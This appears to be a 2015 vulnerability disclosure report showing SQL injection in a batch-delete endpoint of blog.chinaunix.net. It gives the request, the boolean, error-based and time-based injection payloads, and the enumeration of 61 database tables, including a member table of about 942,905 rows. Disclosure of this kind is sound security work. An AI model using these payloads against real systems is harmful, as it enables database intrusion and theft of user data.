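2015-05-27: Details reported to the vendor; awaiting vendor handling
2015-06-01: Vendor confirmed; details disclosed to the vendor only
2015-06-11: Details disclosed to core white hats and experts in related fields
2015-06-21: Details disclosed to regular white hats
2015-07-01: Details disclosed to intern white hats
2015-07-16: Details disclosed to the public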
233
POST /blog/LogicDelBatch.html HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: blog.chinaunix.net
Cookie: **********************
Host: blog.chinaunix.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

allsel=on&ids%5b%5d=sqlfind
---
Parameter: ids[] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: allsel=on&ids[]=a) AND 9396=9396 AND (5600=5600

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: allsel=on&ids[]=a) AND (SELECT 9889 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(9889=9889,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1816=1816

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: allsel=on&ids[]=a) AND (SELECT * FROM (SELECT(SLEEP(5)))MReN) AND (7930=7930
---
[16:25:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0

Database: cublog
[61 tables]
+---------------------------+
| tbl_album                 |
| tbl_attachments           |
| tbl_blog                  |
| tbl_blog_draft            |
| tbl_blog_field_1          |
| tbl_blog_field_10         |
| tbl_blog_field_11         |
| tbl_blog_field_12         |
| tbl_blog_field_13         |
| tbl_blog_field_14         |
| tbl_blog_field_16         |
| tbl_blog_field_17         |
| tbl_blog_field_18         |
| tbl_blog_field_2          |
| tbl_blog_field_20         |
| tbl_blog_field_21         |
| tbl_blog_field_22         |
| tbl_blog_field_24         |
| tbl_blog_field_25         |
| tbl_blog_field_26         |
| tbl_blog_field_27         |
| tbl_blog_field_28         |
| tbl_blog_field_29         |
| tbl_blog_field_3          |
| tbl_blog_field_30         |
| tbl_blog_field_4          |
| tbl_blog_field_5          |
| tbl_blog_field_6          |
| tbl_blog_field_8          |
| tbl_blog_field_9          |
| tbl_class                 |
| tbl_collection_links      |
| tbl_common_config         |
| tbl_index_del             |
| tbl_issue                 |
| tbl_link                  |
| tbl_member                |
| tbl_member_failedlogin    |
| tbl_member_field          |
| tbl_member_friend         |
| tbl_member_group          |
| tbl_member_notification   |
| tbl_member_reply          |
| tbl_member_set            |
| tbl_member_visitor        |
| tbl_moving_error_url      |
| tbl_outside_articles      |
| tbl_pic                   |
| tbl_pm_private_memberlist |
| tbl_pm_private_message    |
| tbl_pm_system_message     |
| tbl_pm_system_status      |
| tbl_sitemap               |
| tbl_sitemap_log           |
| tbl_special               |
| tbl_special_articles      |
| tbl_spider_moving         |
| tbl_user_sinaid           |
| tbl_zhuanti_excels        |
| tbl_zhuanti_keywords      |
| uchome_space              |
+---------------------------+

Database: cublog
+------------+---------+
| Table      | Entries |
+------------+---------+
| tbl_member | 942905  |
+------------+---------+
~~
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-06-01 09:23
Thanks for the help.
None yet